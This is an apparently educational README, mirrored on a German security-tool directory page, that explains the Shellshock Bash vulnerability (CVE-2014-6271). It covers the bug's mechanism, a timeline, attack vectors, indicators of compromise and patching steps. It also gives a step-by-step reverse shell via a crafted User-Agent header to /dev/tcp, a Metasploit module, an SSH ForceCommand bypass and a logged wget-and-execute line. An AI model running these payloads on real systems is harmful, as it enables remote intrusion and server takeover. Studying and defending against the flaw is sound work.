Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
-CVE-2014-6271 — Bildungs-Repository, das die Shellshock-Sicherheitslücke (CVE-2014-6271) detailliert beschreibt, einschließlich technischer Analyse, Angriffsvektoren, Proof-of-Concept-Ausnutzung und Maßnahmen zur Absicherung gegen die Injection von Umgebungsvariablen in Bash. | Kitploit
Tools/GitHubGitHub/kaleth4/-cve-2014-6271
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & Bildung
GitHubkaleth4/-cve-2014-6271

-CVE-2014-6271

Bildungs-Repository, das die Shellshock-Sicherheitslücke (CVE-2014-6271) detailliert beschreibt, einschließlich technischer Analyse, Angriffsvektoren, Proof-of-Concept-Ausnutzung und Maßnahmen zur Absicherung gegen die Injection von Umgebungsvariablen in Bash.

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
root@kitploit:~
 ____  _   _ _____ _     _     ____  _   _  ___   ____ _  __
/ ___|| | | | ____| |   | |   / ___|| | | |/ _ \ / ___| |/ /
\___ \| |_| |  _| | |   | |   \___ \| |_| | | | | |   | ' / 
 ___) |  _  | |___| |___| |___ ___) |  _  | |_| | |___| . \ 
|____/|_| |_|_____|_____|_____|____/|_| |_|\___/ \____|_|\_\

CVE-2014-6271 — Shellshock

Remote Code Execution via Bash-Umgebungsvariablen-Injection

CVE CVSS Type Bash Status

„Ein Fehler, der über Jahrzehnte in Bash verborgen war und die Grundfesten des Internets in weniger als 24 Stunden erschütterte.“


Inhaltsverzeichnis

  • ❓ Was ist Shellshock?
  • 📅 Zeitstrahl
  • 💻 Betroffene Systeme
  • 🔬 Technische Beschreibung
  • 🧪 PoC — Proof-of-Concept
  • ⚔️ Angriffsvektoren
  • 💀 Vollständige Exploitation: Reverse Shell
  • 🔍 Indikatoren für eine Kompromittierung (IoC)
  • 🛡️ Gegenmaßnahmen
  • ⚠️ Haftungsausschluss

❓ Was ist Shellshock?

Shellshock (auch bekannt als Bashdoor) ist eine Familie kritischer Schwachstellen im GNU-Bash-Interpreter, die es einem entfernten Angreifer ermöglicht, beliebige Befehle auf dem Zielsystem auszuführen.

Der grundlegende Fehler: Bash brach die Analyse einer Umgebungsvariable nicht ab, nachdem die Funktionsdefinition beendet war. Jeder Code, der nach () { :; }; angehängt wurde, wurde automatisch ausgeführt.

root@kitploit:~
Umgebungsvariable → Funktionsdefinition → [HIER WIRD ZUSÄTZLICHER CODE AUSGEFÜHRT] ← BUG

Da Webserver (CGI/Apache), SSH-Dienste und DHCP-Clients Header oder Parameter in Bash-Umgebungsvariablen umwandeln, war die Angriffsfläche massiv.


📅 Zeitstrahl

root@kitploit:~
12. Sep. 2014 ── Stéphane Chazelas entdeckt den Fehler und meldet ihn Chet Ramey (Bash-Maintainer)
                 Der Bug existierte bereits seit über 20 Jahren in Bash.

24. Sep. 2014 ── Öffentliche Offenlegung + Veröffentlichung des Patches (CVE-2014-6271)
                 Stunden später: aktive Botnets scannen massiv das Internet.

25.–30. Sep. 2014 ── Verwandte Schwachstellen entdeckt:
                     CVE-2014-6277, CVE-2014-6278, CVE-2014-7169,
                     CVE-2014-7186, CVE-2014-7187

Okt. 2014 ──────── Millionen registrierter Angriffe. Im Schweregrad mit Heartbleed verglichen.

💻 Betroffene Systeme


🔬 Technische Beschreibung

Der Mechanismus des Bugs

Wenn Bash eine Funktion aus einer Umgebungsvariable importiert, liest es bis zur schließenden } der Funktion. In anfälligen Versionen verarbeitete es den nachfolgenden Code weiter, anstatt anzuhalten.

root@kitploit:~
# Bösartige Umgebungsvariable:
SHELLSHOCK='() { :; }; /bin/cat /etc/passwd'

# Anfälliger Bash beim Initialisieren:
# 1. Liest die Funktionsdefinition  → OK
# 2. Findet }; → sollte anhalten
# 3. Fährt FORT → führt /bin/cat /etc/passwd aus  ← BUG

Angriffsablauf via CGI

root@kitploit:~
Angreifer                    Apache-Server (CGI)              Bash (anfällig)
   │                               │                                │
   │  HTTP Request                 │                                │
   │  User-Agent: () { :;}; cmd    │                                │
   │──────────────────────────────▶│                                │
   │                               │  Wandelt Header in Env-Vars um │
   │                               │  HTTP_USER_AGENT=() { :;}; cmd │
   │                               │───────────────────────────────▶│
   │                               │                                │ Führt cmd aus
   │                               │                                │ als www-data
   │◀──────────────────────────────│◀───────────────────────────────│
   │  Antwort + Ausgabe des cmd    │                                │

🧪 PoC — Proof-of-Concept

Einfache Verwundbarkeitsprüfung

root@kitploit:~
env x='() { :;}; echo ANFÄLLIG' bash -c "echo this is a test"

Ergebnis auf ANFÄLLIGEM System:

root@kitploit:~
ANFÄLLIG
this is a test

Ergebnis auf GEPATCHTEM System:

root@kitploit:~
this is a test

(oder ein Syntaxfehler — gibt niemals „ANFÄLLIG“ aus)


⚔️ Angriffsvektoren

1. CGI-BIN (am häufigsten)

Webserver, die .cgi-Skripte verwenden, wandeln die HTTP-Header in Bash-Umgebungsvariablen um.

root@kitploit:~
Betroffene Header: User-Agent, Referer, Cookie, X-Forwarded-For, sowie beliebige benutzerdefinierte Header

2. SSH mit ForceCommand

root@kitploit:~
# Wenn der Server ForceCommand gesetzt hat, kann ein Angreifer mit gültigem Schlüssel dies umgehen
ssh benutzer@ziel '() { :;}; /bin/bash'

3. DHCP-Client

Bösartige DHCP-Server können Umgebungsvariablen in Clients injizieren, die Bash zur Verarbeitung der DHCP-Antwort verwenden.

4. Direkte Umgebungsvariablen

root@kitploit:~
# Jeder Prozess, der Umgebungsvariablen erbt und Bash ausführt
env VAR='() { :;}; bösartiger_befehl' bash -c "legitimes_skript"

💀 Vollständige Exploitation: Reverse Shell

Schritt 1: Listener auf Angreifermaschine

root@kitploit:~
nc -lvnp 4444

Schritt 2: Reverse-Shell-Payload

root@kitploit:~
# Payload, der in den User-Agent eingefügt wird
() { :;}; /bin/bash -i >& /dev/tcp/ANGREIFER_IP/4444 0>&1

Schritt 3: Bösartige Anfrage senden

root@kitploit:~
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" \
     http://anfällige-seite.com/cgi-bin/test.cgi

Schritt 4: Shell erhalten

root@kitploit:~
Connection received from 10.10.10.50
bash: no job control in this shell
sh-4.1$ id
uid=48(apache) gid=48(apache) groups=48(apache)

Metasploit-Modul

root@kitploit:~
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <target>
set TARGETURI /cgi-bin/test.cgi
set LHOST <your_ip>
run

🔍 Indikatoren für eine Kompromittierung (IoC)

In Apache/Nginx-Logs

root@kitploit:~
# Nach dem charakteristischen Muster in der access.log suchen
grep -E "\(\)\s*\{" /var/log/apache2/access.log

# Beispiel für einen bösartigen Logeintrag:
# "() { :;}; wget http://malware.com/bot -O /tmp/x && chmod +x /tmp/x && /tmp/x"

Verdächtige Prozesse

root@kitploit:~
# Kindprozesse von www-data/apache, die nicht existieren sollten
ps aux | grep www-data | grep -v grep
netstat -antup | grep ESTABLISHED

Systemindikatoren

root@kitploit:~
- Neue ausführbare Dateien in /tmp, /var/tmp, /dev/shm
- Ausgehende Verbindungen vom Webserver zu unbekannten IPs
- Veränderung von /etc/crontab oder /etc/passwd
- Bash-Prozesse, die als www-data ohne Terminal laufen

🛡️ Gegenmaßnahmen

Sofort-Patch (KRITISCHE PRIORITÄT)

root@kitploit:~
# Debian / Ubuntu
sudo apt-get update && sudo apt-get install --only-upgrade bash

# RHEL / CentOS / Fedora
sudo yum update bash

# Gepatchte Version prüfen (muss „patches“ anzeigen)
bash --version
# GNU bash, version 4.3.30(1)-release → ANFÄLLIG
# GNU bash, version 4.3.33(1)-release → GEPATCHT (variiert nach Distribution)

Überprüfung nach dem Patch

root@kitploit:~
# Darf nur „this is a test“ ausgeben – NIEMALS „ANFÄLLIG“
env x='() { :;}; echo ANFÄLLIG' bash -c "echo this is a test"

Zusätzliche Maßnahmen

root@kitploit:~
# 1. CGI deaktivieren, falls nicht benötigt
a2dismod cgi

# 2. WAF-Regel, um das Muster zu blockieren
# In ModSecurity:
SecRule REQUEST_HEADERS "@rx \(\)\s*\{" "id:1001,phase:1,deny,msg:'Shellshock Attempt'"

# 3. Fortlaufende Log-Überwachung
tail -f /var/log/apache2/access.log | grep -E "\(\)\s*\{"

⚠️ Haftungsausschluss

Dieses Repository dient ausschließlich zu Bildungszwecken, für Cybersicherheitsforschung und autorisierte Sicherheitsaudits. Alle hier präsentierten Informationen sind gemeinfrei. Das Testen gegen Systeme ohne ausdrückliche Genehmigung ist nach den Gesetzen der meisten Rechtsordnungen illegal. Der Autor übernimmt keine Haftung für die missbräuchliche Verwendung dieser Informationen.


Entdeckt von Stéphane Chazelas · Veröffentlicht am 24. September 2014

CVSS Score: 10.0 (Critical) → Später auf 9.8 unter CVSSv3 angepasst

Tool herunterladen
ProduktAnfällige VersionenStatus
GNU Bash1.0.3 – 4.3Gepatched
Linux (Debian/Ubuntu/CentOS/RHEL)Versionen vor Sept. 2014Gepatched
Apple macOS / OS X10.10 und älterGepatched (Security Update 2014-005)
IoT-Geräte mit eingebettetem BashMehrereJe nach Hersteller unterschiedlich
Webserver mit CGI über ApacheJede Version mit anfälligem BashGepatched